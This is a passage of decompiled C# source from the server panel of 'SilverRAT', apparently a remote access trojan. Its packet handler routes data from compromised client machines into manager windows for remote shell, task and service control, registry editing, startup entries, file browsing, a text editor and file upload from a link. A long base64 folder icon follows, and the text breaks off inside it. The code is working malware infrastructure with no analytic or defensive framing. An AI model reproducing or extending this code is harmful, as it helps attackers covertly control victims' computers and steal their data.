using Guna.UI2.WinForms;
using Microsoft.VisualBasic;
using Microsoft.Win32;
using ProtoBuf;
using Server.Helper;
using SilverRAT.Connection;
using SilverRAT.Forms;
using SilverRAT.Helper;
using SilverRAT.MessagePack;
using SilverRAT.Properties;
using System;
using System.Collections.Generic;
using System.Drawing;
using System.IO;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace SilverRAT.Handle_Packet;

internal class HandleManager
{
    public void Connect(Clients client, MsgPack unpack_msgpack)
    {
        try
        {
            switch (unpack_msgpack.ForcePathObject("Command").AsString)
            {
                case "TaskManager":
                    {
                        Manager manager10 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager10 == null)
                        {
                            client.Disconnected();
                        }
                        else
                        {
                            TaskManager(client, unpack_msgpack);
                        }
                        break;
                    }
                case "RegistryManager":
                    {
                        Manager manager11 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager11 == null)
                        {
                            client.Disconnected();
                        }
                        else
                        {
                            RegManager(client, unpack_msgpack);
                        }
                        break;
                    }
                case "Startup":
                    {
                        Manager manager5 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager5 == null)
                        {
                            client.Disconnected();
                        }
                        Startup(client, unpack_msgpack);
                        break;
                    }
                case "Performance":
                    {
                        Manager manager3 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager3 == null)
                        {
                            client.Disconnected();
                        }
                        Performance(client, unpack_msgpack);
                        break;
                    }
                case "Installed":
                    {
                        Manager manager8 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager8 == null)
                        {
                            client.Disconnected();
                            break;
                        }
                        manager8.ListInstalled.Rows.Clear();
                        string asString2 = unpack_msgpack.ForcePathObject("Data").AsString;
                        string[] array2 = asString2.Split(new string[1] { "-==>" }, StringSplitOptions.None);
                        int num2;
                        for (num2 = 0; num2 <= array2.Length - 1; num2++)
                        {
                            if (array2[num2].Length > 0)
                            {
                                string value3 = array2[num2];
                                string text = array2[num2 + 1];
                                Bitmap bitmap = new Bitmap(Resources.IconInstalled, new Size(24, 24));
                                DataGridViewRow dataGridViewRow2 = new DataGridViewRow
                                {
                                    Height = 24
                                };
                                dataGridViewRow2.Cells.Add(new DataGridViewImageCell
                                {
                                    Value = ((!string.IsNullOrEmpty(text)) ? Image.FromStream(new MemoryStream(Convert.FromBase64String(text))) : bitmap),
                                    ImageLayout = DataGridViewImageCellLayout.Zoom
                                });
                                dataGridViewRow2.Cells.Add(new DataGridViewTextBoxCell
                                {
                                    Value = value3
                                });
                                manager8.ListInstalled.Rows.Insert(0, dataGridViewRow2);
                            }
                            num2++;
                        }
                        break;
                    }
                case "Actived":
                    {
                        Manager manager9 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager9 != null)
                        {
                            if (manager9.Client == null)
                            {
                                manager9.Client = client;
                                manager9.LoaderConnect.Visible = false;
                                manager9.Timer1.Start();
                                MsgPack msgPack = new MsgPack();
                                msgPack.ForcePathObject("Packet").AsString = "fileManager";
                                msgPack.ForcePathObject("Command").AsString = "getDrivers";
                                ThreadPool.QueueUserWorkItem(client.Send, msgPack.Encode2Bytes());
                            }
                        }
                        else
                        {
                            client.Disconnected();
                        }
                        break;
                    }
                case "Shell":
                    {
                        Manager manager6 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager6 == null)
                        {
                            client.Disconnected();
                        }
                        else
                        {
                            Shell(client, unpack_msgpack);
                        }
                        break;
                    }
                case "Service":
                    {
                        Manager manager2 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager2 == null)
                        {
                            client.Disconnected();
                        }
                        else
                        {
                            Service(client, unpack_msgpack);
                        }
                        break;
                    }
                case "Information":
                    {
                        Manager manager7 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager7 != null)
                        {
                            manager7.ListInfo.Rows.Clear();
                            string asString = unpack_msgpack.ForcePathObject("Data").AsString;
                            string[] array = asString.Split(new string[1] { "-==>" }, StringSplitOptions.None);
                            int num;
                            for (num = 0; num <= array.Length - 1; num++)
                            {
                                if (array[num].Length > 0)
                                {
                                    string value = array[num];
                                    string value2 = array[num + 1];
                                    DataGridViewRow dataGridViewRow = new DataGridViewRow
                                    {
                                        Height = 18
                                    };
                                    dataGridViewRow.Cells.Add(new DataGridViewTextBoxCell
                                    {
                                        Value = value
                                    });
                                    dataGridViewRow.Cells.Add(new DataGridViewTextBoxCell
                                    {
                                        Value = value2
                                    });
                                    DataGridViewCell dataGridViewCell = dataGridViewRow.Cells[1];
                                    dataGridViewCell.Style.ForeColor = Color.Green;
                                    manager7.ListInfo.Rows.Insert(0, dataGridViewRow);
                                }
                                num++;
                            }
                            manager7.GetInfo.Enabled = true;
                            manager7.DownTypeInfo.Enabled = true;
                            manager7.CountInfo.Text = manager7.ListInfo.RowCount + " items";
                        }
                        else
                        {
                            client.Disconnected();
                        }
                        break;
                    }
                case "fileManager":
                    {
                        Manager manager4 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager4 == null)
                        {
                            client.Disconnected();
                        }
                        else
                        {
                            FilesManager(client, unpack_msgpack);
                        }
                        break;
                    }
                case "TCPConnection":
                    {
                        Manager manager = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager == null)
                        {
                            client.Disconnected();
                        }
                        else
                        {
                            TcpConnect(client, unpack_msgpack);
                        }
                        break;
                    }
            }
        }
        catch
        {
        }
    }

    private async void FilesManager(Clients client, MsgPack unpack_msgpack)
    {
        Manager FM = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
        switch (unpack_msgpack.ForcePathObject("Command2").AsString)
        {
            case "Editor":
                {
                    FormNote Editor = (FormNote)Application.OpenForms["Editor:" + unpack_msgpack.ForcePathObject("DWID").AsString];
                    if (Editor != null)
                    {
                        Editor.Client = client;
                        Editor.Complete = true;
                        Editor.TextBox1.Text = unpack_msgpack.ForcePathObject("TXT").AsString;
                        Editor.LoaderConnect.Visible = false;
                        Editor.Save.Enabled = true;
                    }
                    break;
                }
            case "UploadLink":
                {
                    UploadFromLink uploadFromLink = (UploadFromLink)Application.OpenForms["UploadFromLink:" + unpack_msgpack.ForcePathObject("DWID").AsString];
                    if (uploadFromLink != null)
                    {
                        uploadFromLink.Client = client;
                        uploadFromLink.Complete = int.Parse(unpack_msgpack.ForcePathObject("Value").AsString);
                        uploadFromLink.IsConnected = true;
                    }
                    break;
                }
            case "UploadFromLink":
                {
                    UploadFromLink uploadFromLink2 = (UploadFromLink)Application.OpenForms["UploadFromLink:" + unpack_msgpack.ForcePathObject("DWID").AsString];
                    if (uploadFromLink2 != null)
                    {
                        uploadFromLink2.Client = client;
                        uploadFromLink2.FileSave.Text = unpack_msgpack.ForcePathObject("Folder").AsString;
                        uploadFromLink2.PatshSave = unpack_msgpack.ForcePathObject("Folder").AsString;
                        uploadFromLink2.HWID = unpack_msgpack.ForcePathObject("DWID").AsString;
                        uploadFromLink2.LoaderConnect.Visible = false;
                        uploadFromLink2.UploadFile.Enabled = true;
                    }
                    break;
                }
            case "getPath":
                if (FM != null)
                {
                    FM.AreListview2.Visible = true;
                    FM.AeroListView1.Visible = false;
                    FM.TextBox1.Text = unpack_msgpack.ForcePathObject("CurrentPath").AsString;
                    if (FM.TextBox1.Text.EndsWith("\\"))
                    {
                        FM.TextBox1.Text = FM.TextBox1.Text.Substring(0, FM.TextBox1.Text.Length - 1);
                    }
                    if (FM.TextBox1.Text.Length == 2)
                    {
                        FM.TextBox1.Text += "\\";
                    }
                    FM.AreListview2.BeginUpdate();
                    FM.AreListview2.Items.Clear();
                    FM.imageList1.Images.Clear();
                    FM.imageList1.Images.Add("0_folder", Image.FromStream(new MemoryStream(Convert.FromBase64String("AAABAAQAEBAAAAEAIABoBAAARgAAACAgAAABACAAKBEAAK4EAAAwMAAAAQAgAGgmAADWFQAAAAAAAAEAIAC/OAAAPjwAACgAAAAQAAAAIAAAAAEAIAAAAAAAQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAUfH6/9Hxur/R8bq/0bF6v9GxOn/RsTp/0XD6P9Fwuj/RcLn/0XB5/9Eweb/RcHn/0C11+8AAAABAAAAAQAAAAFIyOv/j+f//47m//+M5v//i+b//4nl//+I5f//huT//4Xk//+D5P//RcHn/4Pk//9Fwef/AAAAAQAAAAEAAAABSMjs/5Hn//+P5///jub//4zm//+L5v//ieX//4jl//+G5P//heT//0XC5/+F5P//RcLn/wAAAAEAAAABAAAAAUjJ7P+S5///kef//4/n//+O5v//jOb//4vm//+J5f//iOX//4bk//9Fwuj/huT//0XC6P8AAAABAAAAAQAAAAFIye3/lOj//5Ln//+R5///j+f//47m//+M5v//i+b//4nl//+I5f//RcPo/4jl//9Fw+j/AAAAAQAAAAEAAAABScrt/5bo//+U6P//kuf//5Hn//+P5///jub//4zm//+L5v//ieX//0bE6f+B4fz/RsTp/wAAAAEAAAABAAAAAUnL7v+X6P//luj//5To//+S5///kef//4/n//+O5v//jOb//4vm//9XzO//Tsjs/zSSrr8AAAABAAAAAQAAAAFJy+7/men//5fo//+W6P//lOj//5Ln//+R5///j+f//47m//+M5v//h+T+/0bE6f8EDA4RAAAAAQAAAAEAAAABSszv/5rp//+Z6f//l+j//5bo//+U6P//kuf//5Hn//+P5///jub//4zm//9Gxer/AAAAAQAAAAEAAAABAAAAAUrN7/+c6v//mun//5np//+X6P//luj//5To//+S5///kef//4/n//+O5v//R8bq/wAAAAEAAAABAAAAAQAAAAFKze//ner//5zq//+a6f//men//5fo//+W6P//lOj//5Ln//+R5///j+f//0fG6v8AAAABAAAAAQAAAAEAAAABS87w/5/q//+d6v//nOr//5rp//+Z6f//l+j//5bo//+U6P//kuf//5Hn//9Hx+v/AAAAAQAAAAEAAAABAAAAAUvP8P+g6///n+r//53q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9f9x1fb/c9f4/3bY+f952/r/e938/37f/f8AAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABpur//6fq//+l6v//oun//6Xp//+07f//ac7w/2vP8v9t0vT/cNT1/3LW9/901/j/d9n6/3rc+v983vz/gN/9/wAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAGn6v//p+r//6bq//+k6f//pur//7ft//9qzvH/bNDz/27S9P9x1Pb/c9b3/3XX+P942vr/etz7/33e/P+A3/3/AAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAajq//+n6v//pur//6Xq//+o6v//ue7//2vP8f9t0fP/b9P1/3HV9v901/f/dtj5/3nb+v973Pv/ft78/4Hg/f8AAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABqOv//6fq//+m6v//pur//67s//+87///bNDy/27S9P9w0/X/ctX3/3TX9/932fn/edv6/3zd/P9+3vz/guD9/wAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAGp6///qOr//6bq//+x7P//ve///5vi+f9t0fP/b9P0/3HU9v9z1vf/ddj4/3ja+f963Pv/fd38/4Df/P+D4P7/AAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAarr//+p6///r+z//7nv//+K2vb/bNDy/27R8/9w0/X/ctT2/3TW9/922fj/edr5/3zc+/9+3vz/gd/8/4Tg/v8AAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABq+v//7Ds//+w6/7/fdb0/2vP8f9t0fL/b9L0/3HU9f9z1fb/ddj4/3fa+P962/r/fN37/4De/P+C4P3/heH+/wAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAGs6///qOj9/3fT8v9qzvD/bM/y/27R8/9w0/T/ctT1/3TW9/922Pj/edr5/3vb+v993fv/gd/8/4Pg/f+G4f7/AAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAaDl/P9tzu//as3w/2vP8f9t0PL/b9Hz/3HT9f9z1fb/ddf3/3fZ+P962/n/fNz6/37d+/+C3/3/hOH9/37T7u8AAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAAAAwAAAAYAAAAAEAIAAAAAAAQCYAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEaKjAxAAAABQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAU19j4+L4f//AAAAGgAAABEAAAAHAAAAAgAAAAEAAAABAAAAAQAA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